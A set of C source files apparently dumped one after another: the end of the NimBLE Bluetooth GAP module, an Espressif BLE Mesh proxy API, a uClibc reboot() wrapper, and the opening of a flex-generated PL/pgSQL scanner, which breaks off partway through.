ble_hci_le_conn_update_cp cmd; cmd.conn_handle = htole16(conn_handle); cmd.conn_itvl_min = htole16(params->itvl_min); cmd.conn_itvl_max = htole16(params->itvl_max); cmd.conn_latency = htole16(params->latency); cmd.supervision_timeout = htole16(params->supervision_timeout); cmd.min_ce_len = htole16(params->min_ce_len); cmd.max_ce_len = htole16(params->max_ce_len); return ble_hs_hci_cmd_tx(BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_CONN_UPDATE), &cmd, sizeof(cmd), NULL, 0); } static bool ble_gap_validate_conn_params(const struct ble_gap_upd_params *params) { /* Requirements from Bluetooth spec. v4.2 [Vol 2, Part E], 7.8.18 */ if (params->itvl_min > params->itvl_max) { return false; } if (params->itvl_min < 0x0006 || params->itvl_max > 0x0C80) { return false; } if (params->latency > 0x01F3) { return false; } /* According to specification mentioned above we should make sure that: * supervision_timeout_ms > (1 + latency) * 2 * max_interval_ms * => * supervision_timeout * 10 ms > (1 + latency) * 2 * itvl_max * 1.25ms */ if (params->supervision_timeout <= (((1 + params->latency) * params->itvl_max) / 4)) { return false; } return true; } #endif int ble_gap_update_params(uint16_t conn_handle, const struct ble_gap_upd_params *params) { #if NIMBLE_BLE_CONNECT struct ble_l2cap_sig_update_params l2cap_params; struct ble_gap_update_entry *entry; struct ble_gap_update_entry *dup; struct ble_hs_conn *conn; int l2cap_update; int rc; l2cap_update = 0; /* Validate parameters with a spec */ if (!ble_gap_validate_conn_params(params)) { return BLE_HS_EINVAL; } STATS_INC(ble_gap_stats, update); memset(&l2cap_params, 0, sizeof l2cap_params); entry = NULL; ble_hs_lock(); conn = ble_hs_conn_find(conn_handle); if (conn == NULL) { rc = BLE_HS_ENOTCONN; goto done; } /* Don't allow two concurrent updates to the same connection. */ dup = ble_gap_update_entry_find(conn_handle, NULL); if (dup != NULL) { rc = BLE_HS_EALREADY; goto done; } entry = ble_gap_update_entry_alloc(); if (entry == NULL) { rc = BLE_HS_ENOMEM; goto done; } entry->conn_handle = conn_handle; entry->params = *params; entry->exp_os_ticks = ble_npl_time_get() + ble_npl_time_ms_to_ticks32(BLE_GAP_UPDATE_TIMEOUT_MS); BLE_HS_LOG(INFO, "GAP procedure initiated: "); ble_gap_log_update(conn_handle, params); BLE_HS_LOG(INFO, "\n"); /* * If LL update procedure is not supported on this connection and we are * the slave, fail over to the L2CAP update procedure. */ if ((conn->supported_feat & BLE_HS_HCI_LE_FEAT_CONN_PARAM_REQUEST) == 0 && !(conn->bhc_flags & BLE_HS_CONN_F_MASTER)) { l2cap_update = 1; rc = 0; } else { rc = ble_gap_update_tx(conn_handle, params); } done: ble_hs_unlock(); if (!l2cap_update) { ble_hs_timer_resched(); } else { ble_gap_update_to_l2cap(params, &l2cap_params); rc = ble_l2cap_sig_update(conn_handle, &l2cap_params, ble_gap_update_l2cap_cb, NULL); } ble_hs_lock(); if (rc == 0) { SLIST_INSERT_HEAD(&ble_gap_update_entries, entry, next); } else { ble_gap_update_entry_free(entry); STATS_INC(ble_gap_stats, update_fail); } ble_hs_unlock(); return rc; #else return BLE_HS_ENOTSUP; #endif } /***************************************************************************** * $security * *****************************************************************************/ int ble_gap_security_initiate(uint16_t conn_handle) { #if NIMBLE_BLE_SM struct ble_store_value_sec value_sec; struct ble_store_key_sec key_sec; struct ble_hs_conn_addrs addrs; ble_hs_conn_flags_t conn_flags; struct ble_hs_conn *conn; int rc; STATS_INC(ble_gap_stats, security_initiate); ble_hs_lock(); conn = ble_hs_conn_find(conn_handle); if (conn != NULL) { conn_flags = conn->bhc_flags; ble_hs_conn_addrs(conn, &addrs); memset(&key_sec, 0, sizeof key_sec); key_sec.peer_addr = addrs.peer_id_addr; } ble_hs_unlock(); if (conn == NULL) { rc = BLE_HS_ENOTCONN; goto done; } if (conn_flags & BLE_HS_CONN_F_MASTER) { /* Search the security database for an LTK for this peer. If one * is found, perform the encryption procedure rather than the pairing * procedure. */ rc = ble_store_read_peer_sec(&key_sec, &value_sec); if (rc == 0 && value_sec.ltk_present) { rc = ble_sm_enc_initiate(conn_handle, value_sec.key_size, value_sec.ltk, value_sec.ediv, value_sec.rand_num, value_sec.authenticated); if (rc != 0) { goto done; } } else { rc = ble_sm_pair_initiate(conn_handle); if (rc != 0) { goto done; } } } else { rc = ble_sm_slave_initiate(conn_handle); if (rc != 0) { goto done; } } rc = 0; done: if (rc != 0) { STATS_INC(ble_gap_stats, security_initiate_fail); } return rc; #else return BLE_HS_ENOTSUP; #endif } int ble_gap_pair_initiate(uint16_t conn_handle) { int rc; rc = ble_sm_pair_initiate(conn_handle); return rc; } int ble_gap_encryption_initiate(uint16_t conn_handle, uint8_t key_size, const uint8_t *ltk, uint16_t ediv, uint64_t rand_val, int auth) { #if NIMBLE_BLE_SM ble_hs_conn_flags_t conn_flags; int rc; rc = ble_hs_atomic_conn_flags(conn_handle, &conn_flags); if (rc != 0) { return rc; } if (!(conn_flags & BLE_HS_CONN_F_MASTER)) { return BLE_HS_EROLE; } rc = ble_sm_enc_initiate(conn_handle, key_size, ltk, ediv, rand_val, auth); return rc; #else return BLE_HS_ENOTSUP; #endif } int ble_gap_unpair(const ble_addr_t *peer_addr) { struct ble_hs_conn *conn; if (ble_addr_cmp(peer_addr, BLE_ADDR_ANY) == 0) { return BLE_HS_EINVAL; } ble_hs_lock(); conn = ble_hs_conn_find_by_addr(peer_addr); if (conn != NULL) { ble_gap_terminate_with_conn(conn, BLE_ERR_REM_USER_CONN_TERM); } ble_hs_unlock(); ble_hs_pvcy_remove_entry(peer_addr->type, peer_addr->val); return ble_store_util_delete_peer(peer_addr); } int ble_gap_unpair_oldest_peer(void) { ble_addr_t oldest_peer_id_addr; int num_peers; int rc; rc = ble_store_util_bonded_peers( &oldest_peer_id_addr, &num_peers, 1); if (rc != 0) { return rc; } if (num_peers == 0) { return BLE_HS_ENOENT; } rc = ble_gap_unpair(&oldest_peer_id_addr); if (rc != 0) { return rc; } return 0; } int ble_gap_unpair_oldest_except(const ble_addr_t *peer_addr) { ble_addr_t peer_id_addrs[MYNEWT_VAL(BLE_STORE_MAX_BONDS)]; int num_peers; int rc, i; rc = ble_store_util_bonded_peers( &peer_id_addrs[0], &num_peers, MYNEWT_VAL(BLE_STORE_MAX_BONDS)); if (rc != 0) { return rc; } if (num_peers == 0) { return BLE_HS_ENOENT; } for (i = 0; i < num_peers; i++) { if (ble_addr_cmp(peer_addr, &peer_id_addrs[i]) != 0) { break; } } if (i >= num_peers) { return BLE_HS_ENOMEM; } return ble_gap_unpair(&peer_id_addrs[i]); } void ble_gap_passkey_event(uint16_t conn_handle, struct ble_gap_passkey_params *passkey_params) { #if NIMBLE_BLE_SM struct ble_gap_event event; BLE_HS_LOG(DEBUG, "send passkey action request %d\n", passkey_params->action); memset(&event, 0, sizeof event); event.type = BLE_GAP_EVENT_PASSKEY_ACTION; event.passkey.conn_handle = conn_handle; event.passkey.params = *passkey_params; ble_gap_call_conn_event_cb(&event, conn_handle); #endif } void ble_gap_enc_event(uint16_t conn_handle, int status, int security_restored, int bonded) { #if NIMBLE_BLE_SM struct ble_gap_event event; memset(&event, 0, sizeof event); event.type = BLE_GAP_EVENT_ENC_CHANGE; event.enc_change.conn_handle = conn_handle; event.enc_change.status = status; ble_gap_event_listener_call(&event); ble_gap_call_conn_event_cb(&event, conn_handle); if (status != 0) { return; } /* If encryption succeded and encryption has been restored for bonded device, * notify gatt server so it has chance to send notification/indication if needed. */ if (security_restored) { ble_gatts_bonding_restored(conn_handle); return; } /* If this is fresh pairing and bonding has been established, * notify gatt server about that so previous subscriptions (before bonding) * can be stored. */ if (bonded) { ble_gatts_bonding_established(conn_handle); } #endif } void ble_gap_identity_event(uint16_t conn_handle) { #if NIMBLE_BLE_SM struct ble_gap_event event; BLE_HS_LOG(DEBUG, "send identity changed"); memset(&event, 0, sizeof event); event.type = BLE_GAP_EVENT_IDENTITY_RESOLVED; event.identity_resolved.conn_handle = conn_handle; ble_gap_call_conn_event_cb(&event, conn_handle); #endif } int ble_gap_repeat_pairing_event(const struct ble_gap_repeat_pairing *rp) { #if NIMBLE_BLE_SM struct ble_gap_event event; int rc; memset(&event, 0, sizeof event); event.type = BLE_GAP_EVENT_REPEAT_PAIRING; event.repeat_pairing = *rp; rc = ble_gap_call_conn_event_cb(&event, rp->conn_handle); return rc; #else return 0; #endif } /***************************************************************************** * $rssi * *****************************************************************************/ int ble_gap_conn_rssi(uint16_t conn_handle, int8_t *out_rssi) { int rc; rc = ble_hs_hci_util_read_rssi(conn_handle, out_rssi); return rc; } /***************************************************************************** * $notify * *****************************************************************************/ void ble_gap_notify_rx_event(uint16_t conn_handle, uint16_t attr_handle, struct os_mbuf *om, int is_indication) { #if !MYNEWT_VAL(BLE_GATT_NOTIFY) && !MYNEWT_VAL(BLE_GATT_INDICATE) return; #endif struct ble_gap_event event; memset(&event, 0, sizeof event); event.type = BLE_GAP_EVENT_NOTIFY_RX; event.notify_rx.conn_handle = conn_handle; event.notify_rx.attr_handle = attr_handle; event.notify_rx.om = om; event.notify_rx.indication = is_indication; ble_gap_event_listener_call(&event); ble_gap_call_conn_event_cb(&event, conn_handle); os_mbuf_free_chain(event.notify_rx.om); } void ble_gap_notify_tx_event(int status, uint16_t conn_handle, uint16_t attr_handle, int is_indication) { #if MYNEWT_VAL(BLE_GATT_NOTIFY) || MYNEWT_VAL(BLE_GATT_INDICATE) struct ble_gap_event event; memset(&event, 0, sizeof event); event.type = BLE_GAP_EVENT_NOTIFY_TX; event.notify_tx.conn_handle = conn_handle; event.notify_tx.status = status; event.notify_tx.attr_handle = attr_handle; event.notify_tx.indication = is_indication; ble_gap_event_listener_call(&event); ble_gap_call_conn_event_cb(&event, conn_handle); #endif } /***************************************************************************** * $subscribe * *****************************************************************************/ void ble_gap_subscribe_event(uint16_t conn_handle, uint16_t attr_handle, uint8_t reason, uint8_t prev_notify, uint8_t cur_notify, uint8_t prev_indicate, uint8_t cur_indicate) { struct ble_gap_event event; BLE_HS_DBG_ASSERT(prev_notify != cur_notify || prev_indicate != cur_indicate); BLE_HS_DBG_ASSERT(reason == BLE_GAP_SUBSCRIBE_REASON_WRITE || reason == BLE_GAP_SUBSCRIBE_REASON_TERM || reason == BLE_GAP_SUBSCRIBE_REASON_RESTORE); memset(&event, 0, sizeof event); event.type = BLE_GAP_EVENT_SUBSCRIBE; event.subscribe.conn_handle = conn_handle; event.subscribe.attr_handle = attr_handle; event.subscribe.reason = reason; event.subscribe.prev_notify = !!prev_notify; event.subscribe.cur_notify = !!cur_notify; event.subscribe.prev_indicate = !!prev_indicate; event.subscribe.cur_indicate = !!cur_indicate; ble_gap_event_listener_call(&event); ble_gap_call_conn_event_cb(&event, conn_handle); } /***************************************************************************** * $mtu * *****************************************************************************/ void ble_gap_mtu_event(uint16_t conn_handle, uint16_t cid, uint16_t mtu) { struct ble_gap_event event; memset(&event, 0, sizeof event); event.type = BLE_GAP_EVENT_MTU; event.mtu.conn_handle = conn_handle; event.mtu.channel_id = cid; event.mtu.value = mtu; ble_gap_event_listener_call(&event); ble_gap_call_conn_event_cb(&event, conn_handle); } /***************************************************************************** * $preempt * *****************************************************************************/ void ble_gap_preempt_no_lock(void) { int rc; int i; (void)rc; (void)i; #if NIMBLE_BLE_ADVERTISE #if MYNEWT_VAL(BLE_EXT_ADV) for (i = 0; i < BLE_ADV_INSTANCES; i++) { rc = ble_gap_ext_adv_stop_no_lock(i); if (rc == 0) { ble_gap_slave[i].preempted = 1; } } #else rc = ble_gap_adv_stop_no_lock(); if (rc == 0) { ble_gap_slave[0].preempted = 1; } #endif #endif #if NIMBLE_BLE_CONNECT rc = ble_gap_conn_cancel_no_lock(); if (rc == 0) { ble_gap_master.preempted_op = BLE_GAP_OP_M_CONN; } #endif #if NIMBLE_BLE_SCAN rc = ble_gap_disc_cancel_no_lock(); if (rc == 0) { ble_gap_master.preempted_op = BLE_GAP_OP_M_DISC; } #endif } /** * @brief Preempts the GAP if it is not already preempted. * * Aborts all active GAP procedures and prevents new ones from being started. * This function is used to ensure an idle GAP so that the controller's * resolving list can be modified. When done accessing the resolving list, the * caller must call `ble_gap_preempt_done()` to permit new GAP procedures. * * On preemption, all aborted GAP procedures are reported with a status or * reason code of BLE_HS_EPREEMPTED. An attempt to initiate a new GAP * procedure during preemption fails with a return code of BLE_HS_EPREEMPTED. */ void ble_gap_preempt(void) { ble_hs_lock(); if (!ble_gap_is_preempted()) { ble_gap_preempt_no_lock(); } ble_hs_unlock(); } /** * Takes GAP out of the preempted state, allowing new GAP procedures to be * initiated. This function should only be called after a call to * `ble_gap_preempt()`. */ static struct ble_npl_mutex preempt_done_mutex; void ble_gap_preempt_done(void) { struct ble_gap_event event; ble_gap_event_fn *master_cb; void *master_arg; int disc_preempted; int i; static struct { ble_gap_event_fn *cb; void *arg; } slaves[BLE_ADV_INSTANCES]; disc_preempted = 0; /* Protects slaves from accessing by multiple threads */ ble_npl_mutex_pend(&preempt_done_mutex, 0xFFFFFFFF); memset(slaves, 0, sizeof(slaves)); ble_hs_lock(); for (i = 0; i < BLE_ADV_INSTANCES; i++) { if (ble_gap_slave[i].preempted) { ble_gap_slave[i].preempted = 0; slaves[i].cb = ble_gap_slave[i].cb; slaves[i].arg = ble_gap_slave[i].cb_arg; } } if (ble_gap_master.preempted_op == BLE_GAP_OP_M_DISC) { ble_gap_master.preempted_op = BLE_GAP_OP_NULL; disc_preempted = 1; master_cb = ble_gap_master.cb; master_arg = ble_gap_master.cb_arg; } ble_hs_unlock(); event.type = BLE_GAP_EVENT_ADV_COMPLETE; event.adv_complete.reason = BLE_HS_EPREEMPTED; for (i = 0; i < BLE_ADV_INSTANCES; i++) { if (slaves[i].cb) { #if MYNEWT_VAL(BLE_EXT_ADV) event.adv_complete.instance = i; event.adv_complete.conn_handle = i; #endif ble_gap_call_event_cb(&event, slaves[i].cb, slaves[i].arg); } } ble_npl_mutex_release(&preempt_done_mutex); if (disc_preempted) { event.type = BLE_GAP_EVENT_DISC_COMPLETE; event.disc_complete.reason = BLE_HS_EPREEMPTED; ble_gap_call_event_cb(&event, master_cb, master_arg); } } int ble_gap_event_listener_register(struct ble_gap_event_listener *listener, ble_gap_event_fn *fn, void *arg) { struct ble_gap_event_listener *evl = NULL; int rc; SLIST_FOREACH(evl, &ble_gap_event_listener_list, link) { if (evl == listener) { break; } } if (!evl) { if (fn) { memset(listener, 0, sizeof(*listener)); listener->fn = fn; listener->arg = arg; SLIST_INSERT_HEAD(&ble_gap_event_listener_list, listener, link); rc = 0; } else { rc = BLE_HS_EINVAL; } } else { rc = BLE_HS_EALREADY; } return rc; } int ble_gap_event_listener_unregister(struct ble_gap_event_listener *listener) { struct ble_gap_event_listener *evl = NULL; int rc; /* * We check if element exists on the list only for sanity to let caller * know whether it registered its listener before. */ SLIST_FOREACH(evl, &ble_gap_event_listener_list, link) { if (evl == listener) { break; } } if (!evl) { rc = BLE_HS_ENOENT; } else { SLIST_REMOVE(&ble_gap_event_listener_list, listener, ble_gap_event_listener, link); rc = 0; } return rc; } static int ble_gap_event_listener_call(struct ble_gap_event *event) { struct ble_gap_event_listener *evl = NULL; SLIST_FOREACH(evl, &ble_gap_event_listener_list, link) { evl->fn(event, evl->arg); } return 0; } /***************************************************************************** * $init * *****************************************************************************/ int ble_gap_init(void) { int rc; memset(&ble_gap_master, 0, sizeof(ble_gap_master)); memset(ble_gap_slave, 0, sizeof(ble_gap_slave)); #if MYNEWT_VAL(BLE_PERIODIC_ADV) memset(&ble_gap_sync, 0, sizeof(ble_gap_sync)); #endif ble_npl_mutex_init(&preempt_done_mutex); SLIST_INIT(&ble_gap_update_entries); SLIST_INIT(&ble_gap_event_listener_list); rc = os_mempool_init(&ble_gap_update_entry_pool, MYNEWT_VAL(BLE_GAP_MAX_PENDING_CONN_PARAM_UPDATE), sizeof (struct ble_gap_update_entry), ble_gap_update_entry_mem, "ble_gap_update"); switch (rc) { case 0: break; case OS_ENOMEM: rc = BLE_HS_ENOMEM; goto err; default: rc = BLE_HS_EOS; goto err; } rc = stats_init_and_reg( STATS_HDR(ble_gap_stats), STATS_SIZE_INIT_PARMS(ble_gap_stats, STATS_SIZE_32), STATS_NAME_INIT_PARMS(ble_gap_stats), "ble_gap"); if (rc != 0) { goto err; } return 0; err: return rc; }
185568.c
// Copyright 2017-2019 Espressif Systems (Shanghai) PTE LTD // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. #include <stdint.h> #include <string.h> #include "esp_err.h" #include "btc_ble_mesh_prov.h" #include "esp_ble_mesh_defs.h" esp_err_t esp_ble_mesh_proxy_identity_enable(void) { btc_msg_t msg = {0}; ESP_BLE_HOST_STATUS_CHECK(ESP_BLE_HOST_STATUS_ENABLED); msg.sig = BTC_SIG_API_CALL; msg.pid = BTC_PID_PROV; msg.act = BTC_BLE_MESH_ACT_PROXY_IDENTITY_ENABLE; return (btc_transfer_context(&msg, NULL, 0, NULL) == BT_STATUS_SUCCESS ? ESP_OK : ESP_FAIL); } esp_err_t esp_ble_mesh_proxy_gatt_enable(void) { btc_msg_t msg = {0}; ESP_BLE_HOST_STATUS_CHECK(ESP_BLE_HOST_STATUS_ENABLED); msg.sig = BTC_SIG_API_CALL; msg.pid = BTC_PID_PROV; msg.act = BTC_BLE_MESH_ACT_PROXY_GATT_ENABLE; return (btc_transfer_context(&msg, NULL, 0, NULL) == BT_STATUS_SUCCESS ? ESP_OK : ESP_FAIL); } esp_err_t esp_ble_mesh_proxy_gatt_disable(void) { btc_msg_t msg = {0}; ESP_BLE_HOST_STATUS_CHECK(ESP_BLE_HOST_STATUS_ENABLED); msg.sig = BTC_SIG_API_CALL; msg.pid = BTC_PID_PROV; msg.act = BTC_BLE_MESH_ACT_PROXY_GATT_DISABLE; return (btc_transfer_context(&msg, NULL, 0, NULL) == BT_STATUS_SUCCESS ? ESP_OK : ESP_FAIL); } esp_err_t esp_ble_mesh_proxy_client_connect(esp_ble_mesh_bd_addr_t addr, esp_ble_mesh_addr_type_t addr_type, uint16_t net_idx) { btc_ble_mesh_prov_args_t arg = {0}; btc_msg_t msg = {0}; if (!addr || addr_type > ESP_BLE_MESH_ADDR_TYPE_RANDOM) { return ESP_ERR_INVALID_ARG; } ESP_BLE_HOST_STATUS_CHECK(ESP_BLE_HOST_STATUS_ENABLED); msg.sig = BTC_SIG_API_CALL; msg.pid = BTC_PID_PROV; msg.act = BTC_BLE_MESH_ACT_PROXY_CLIENT_CONNECT; memcpy(arg.proxy_client_connect.addr, addr, BD_ADDR_LEN); arg.proxy_client_connect.addr_type = addr_type; arg.proxy_client_connect.net_idx = net_idx; return (btc_transfer_context(&msg, &arg, sizeof(btc_ble_mesh_prov_args_t), NULL) == BT_STATUS_SUCCESS ? ESP_OK : ESP_FAIL); } esp_err_t esp_ble_mesh_proxy_client_disconnect(uint8_t conn_handle) { btc_ble_mesh_prov_args_t arg = {0}; btc_msg_t msg = {0}; ESP_BLE_HOST_STATUS_CHECK(ESP_BLE_HOST_STATUS_ENABLED); msg.sig = BTC_SIG_API_CALL; msg.pid = BTC_PID_PROV; msg.act = BTC_BLE_MESH_ACT_PROXY_CLIENT_DISCONNECT; arg.proxy_client_disconnect.conn_handle = conn_handle; return (btc_transfer_context(&msg, &arg, sizeof(btc_ble_mesh_prov_args_t), NULL) == BT_STATUS_SUCCESS ? ESP_OK : ESP_FAIL); } esp_err_t esp_ble_mesh_proxy_client_set_filter_type(uint8_t conn_handle, uint16_t net_idx, esp_ble_mesh_proxy_filter_type_t filter_type) { btc_ble_mesh_prov_args_t arg = {0}; btc_msg_t msg = {0}; if (filter_type > PROXY_FILTER_BLACKLIST) { return ESP_ERR_INVALID_ARG; } ESP_BLE_HOST_STATUS_CHECK(ESP_BLE_HOST_STATUS_ENABLED); msg.sig = BTC_SIG_API_CALL; msg.pid = BTC_PID_PROV; msg.act = BTC_BLE_MESH_ACT_PROXY_CLIENT_SET_FILTER_TYPE; arg.proxy_client_set_filter_type.conn_handle = conn_handle; arg.proxy_client_set_filter_type.net_idx = net_idx; arg.proxy_client_set_filter_type.filter_type = filter_type; return (btc_transfer_context(&msg, &arg, sizeof(btc_ble_mesh_prov_args_t), NULL) == BT_STATUS_SUCCESS ? ESP_OK : ESP_FAIL); } esp_err_t esp_ble_mesh_proxy_client_add_filter_addr(uint8_t conn_handle, uint16_t net_idx, uint16_t *addr, uint16_t addr_num) { btc_ble_mesh_prov_args_t arg = {0}; btc_msg_t msg = {0}; if (!addr || addr_num == 0) { return ESP_ERR_INVALID_ARG; } ESP_BLE_HOST_STATUS_CHECK(ESP_BLE_HOST_STATUS_ENABLED); msg.sig = BTC_SIG_API_CALL; msg.pid = BTC_PID_PROV; msg.act = BTC_BLE_MESH_ACT_PROXY_CLIENT_ADD_FILTER_ADDR; arg.proxy_client_add_filter_addr.conn_handle = conn_handle; arg.proxy_client_add_filter_addr.net_idx = net_idx; arg.proxy_client_add_filter_addr.addr_num = addr_num; arg.proxy_client_add_filter_addr.addr = addr; return (btc_transfer_context(&msg, &arg, sizeof(btc_ble_mesh_prov_args_t), btc_ble_mesh_prov_arg_deep_copy) == BT_STATUS_SUCCESS ? ESP_OK : ESP_FAIL); } esp_err_t esp_ble_mesh_proxy_client_remove_filter_addr(uint8_t conn_handle, uint16_t net_idx, uint16_t *addr, uint16_t addr_num) { btc_ble_mesh_prov_args_t arg = {0}; btc_msg_t msg = {0}; if (!addr || addr_num == 0) { return ESP_ERR_INVALID_ARG; } ESP_BLE_HOST_STATUS_CHECK(ESP_BLE_HOST_STATUS_ENABLED); msg.sig = BTC_SIG_API_CALL; msg.pid = BTC_PID_PROV; msg.act = BTC_BLE_MESH_ACT_PROXY_CLIENT_REMOVE_FILTER_ADDR; arg.proxy_client_remove_filter_addr.conn_handle = conn_handle; arg.proxy_client_remove_filter_addr.net_idx = net_idx; arg.proxy_client_remove_filter_addr.addr_num = addr_num; arg.proxy_client_remove_filter_addr.addr = addr; return (btc_transfer_context(&msg, &arg, sizeof(btc_ble_mesh_prov_args_t), btc_ble_mesh_prov_arg_deep_copy) == BT_STATUS_SUCCESS ? ESP_OK : ESP_FAIL); }
763750.c
/* vi: set sw=4 ts=4: */ /* * _reboot() for uClibc * * Copyright (C) 2000-2006 Erik Andersen <andersen@uclibc.org> * * Licensed under the LGPL v2.1, see the file COPYING.LIB in this tarball. */ #include <sys/syscall.h> #include <sys/reboot.h> #define __NR__reboot __NR_reboot static __inline__ _syscall3(int, _reboot, int, magic, int, magic2, int, flag) int reboot(int flag) { return (_reboot((int) 0xfee1dead, 672274793, flag)); }
744016.c
#line 2 "pl_scan.c" #line 4 "pl_scan.c" #define YY_INT_ALIGNED short int /* A lexical scanner generated by flex */ #define yy_create_buffer plpgsql_base_yy_create_buffer #define yy_delete_buffer plpgsql_base_yy_delete_buffer #define yy_flex_debug plpgsql_base_yy_flex_debug #define yy_init_buffer plpgsql_base_yy_init_buffer #define yy_flush_buffer plpgsql_base_yy_flush_buffer #define yy_load_buffer_state plpgsql_base_yy_load_buffer_state #define yy_switch_to_buffer plpgsql_base_yy_switch_to_buffer #define yyin plpgsql_base_yyin #define yyleng plpgsql_base_yyleng #define yylex plpgsql_base_yylex #define yylineno plpgsql_base_yylineno #define yyout plpgsql_base_yyout #define yyrestart plpgsql_base_yyrestart #define yytext plpgsql_base_yytext #define yywrap plpgsql_base_yywrap #define yyalloc plpgsql_base_yyalloc #define yyrealloc plpgsql_base_yyrealloc #define yyfree plpgsql_base_yyfree #define FLEX_SCANNER #define YY_FLEX_MAJOR_VERSION 2 #define YY_FLEX_MINOR_VERSION 5 #define YY_FLEX_SUBMINOR_VERSION 35 #if YY_FLEX_SUBMINOR_VERSION > 0 #define FLEX_BETA #endif /* First, we deal with platform-specific or compiler-specific issues. */ /* begin standard C headers. */ #include <stdio.h> #include <string.h> #include <errno.h> #include <stdlib.h> /* end standard C headers. */ /* flex integer type definitions */ #ifndef FLEXINT_H #define FLEXINT_H /* C99 systems have <inttypes.h>. Non-C99 systems may or may not. */ #if defined (__STDC_VERSION__) && __STDC_VERSION__ >= 199901L /* C99 says to define __STDC_LIMIT_MACROS before including stdint.h, * if you want the limit (max/min) macros for int types. */ #ifndef __STDC_LIMIT_MACROS #define __STDC_LIMIT_MACROS 1 #endif #include <inttypes.h> typedef int8_t flex_int8_t; typedef uint8_t flex_uint8_t; typedef int16_t flex_int16_t; typedef uint16_t flex_uint16_t; typedef int32_t flex_int32_t; typedef uint32_t flex_uint32_t; #else typedef signed char flex_int8_t; typedef short int flex_int16_t; typedef int flex_int32_t; typedef unsigned char flex_uint8_t; typedef unsigned short int flex_uint16_t; typedef unsigned int flex_uint32_t; #endif /* ! C99 */ /* Limits of integral types. */ #ifndef INT8_MIN #define INT8_MIN (-128) #endif #ifndef INT16_MIN #define INT16_MIN (-32767-1) #endif #ifndef INT32_MIN #define INT32_MIN (-2147483647-1) #endif #ifndef INT8_MAX #define INT8_MAX (127) #endif #ifndef INT16_MAX #define INT16_MAX (32767) #endif #ifndef INT32_MAX #define INT32_MAX (2147483647) #endif #ifndef UINT8_MAX #define UINT8_MAX (255U) #endif #ifndef UINT16_MAX #define UINT16_MAX (65535U) #endif #ifndef UINT32_MAX #define UINT32_MAX (4294967295U) #endif #endif /* ! FLEXINT_H */ #ifdef __cplusplus /* The "const" storage-class-modifier is valid. */ #define YY_USE_CONST #else /* ! __cplusplus */ /* C99 requires __STDC__ to be defined as 1. */ #if defined (__STDC__) #define YY_USE_CONST #endif /* defined (__STDC__) */ #endif /* ! __cplusplus */ #ifdef YY_USE_CONST #define yyconst const #else #define yyconst #endif /* Returned upon end-of-file. */ #define YY_NULL 0 /* Promotes a possibly negative, possibly signed char to an unsigned * integer for use as an array index. If the signed char is negative, * we want to instead treat it as an 8-bit unsigned char, hence the * double cast. */ #define YY_SC_TO_UI(c) ((unsigned int) (unsigned char) c) /* Enter a start condition. This macro really ought to take a parameter, * but we do it the disgusting crufty way forced on us by the ()-less * definition of BEGIN. */ #define BEGIN (yy_start) = 1 + 2 * /* Translate the current start state into a value that can be later handed * to BEGIN to return to the state. The YYSTATE alias is for lex * compatibility. */ #define YY_START (((yy_start) - 1) / 2) #define YYSTATE YY_START /* Action number for EOF rule of a given start state. */ #define YY_STATE_EOF(state) (YY_END_OF_BUFFER + state + 1) /* Special action meaning "start processing a new file". */ #define YY_NEW_FILE plpgsql_base_yyrestart(plpgsql_base_yyin ) #define YY_END_OF_BUFFER_CHAR 0 /* Size of default input buffer. */ #ifndef YY_BUF_SIZE #define YY_BUF_SIZE 16384 #endif /* The state buf must be large enough to hold one state per character in the main buffer. */ #define YY_STATE_BUF_SIZE ((YY_BUF_SIZE + 2) * sizeof(yy_state_type)) #ifndef YY_TYPEDEF_YY_BUFFER_STATE #define YY_TYPEDEF_YY_BUFFER_STATE typedef struct yy_buffer_state *YY_BUFFER_STATE; #endif extern int plpgsql_base_yyleng; extern FILE *plpgsql_base_yyin, *plpgsql_base_yyout; #define EOB_ACT_CONTINUE_SCAN 0 #define EOB_ACT_END_OF_FILE 1 #define EOB_ACT_LAST_MATCH 2 #define YY_LESS_LINENO(n) /* Return all but the first "n" matched characters back to the input stream. */ #define yyless(n) \ do \ { \ /* Undo effects of setting up plpgsql_base_yytext. */ \ int yyless_macro_arg = (n); \ YY_LESS_LINENO(yyless_macro_arg);\ *yy_cp = (yy_hold_char); \ YY_RESTORE_YY_MORE_OFFSET \ (yy_c_buf_p) = yy_cp = yy_bp + yyless_macro_arg - YY_MORE_ADJ; \ YY_DO_BEFORE_ACTION; /* set up plpgsql_base_yytext again */ \ } \ while ( 0 ) #define unput(c) yyunput( c, (yytext_ptr) ) #ifndef YY_TYPEDEF_YY_SIZE_T #define YY_TYPEDEF_YY_SIZE_T typedef size_t yy_size_t; #endif #ifndef YY_STRUCT_YY_BUFFER_STATE #define YY_STRUCT_YY_BUFFER_STATE struct yy_buffer_state { FILE *yy_input_file; char *yy_ch_buf; /* input buffer */ char *yy_buf_pos; /* current position in input buffer */ /* Size of input buffer in bytes, not including room for EOB * characters. */ yy_size_t yy_buf_size; /* Number of characters read into yy_ch_buf, not including EOB * characters. */ int yy_n_chars; /* Whether we "own" the buffer - i.e., we know we created it, * and can realloc() it to grow it, and should free() it to * delete it. */ int yy_is_our_buffer; /* Whether this is an "interactive" input source; if so, and * if we're using stdio for input, then we want to use getc() * instead of fread(), to make sure we stop fetching input after * each newline. */ int yy_is_interactive; /* Whether we're considered to be at the beginning of a line. * If so, '^' rules will be active on the next match, otherwise * not. */ int yy_at_bol; int yy_bs_lineno; /**< The line count. */ int yy_bs_column; /**< The column count. */ /* Whether to try to fill the input buffer when we reach the * end of it. */ int yy_fill_buffer; int yy_buffer_status; #define YY_BUFFER_NEW 0 #define YY_BUFFER_NORMAL 1 /* When an EOF's been seen but there's still some text to process * then we mark the buffer as YY_EOF_PENDING, to indicate that we * shouldn't try reading from the input source any more. We might * still have a bunch of tokens to match, though, because of * possible backing-up. * * When we actually see the EOF, we change the status to "new" * (via plpgsql_base_yyrestart()), so that the user can continue scanning by * just pointing plpgsql_base_yyin at a new input file. */ #define YY_BUFFER_EOF_PENDING 2 }; #endif /* !YY_STRUCT_YY_BUFFER_STATE */ /* Stack of input buffers. */ static size_t yy_buffer_stack_top = 0; /**< index of top of stack. */ static size_t yy_buffer_stack_max = 0; /**< capacity of stack. */ static 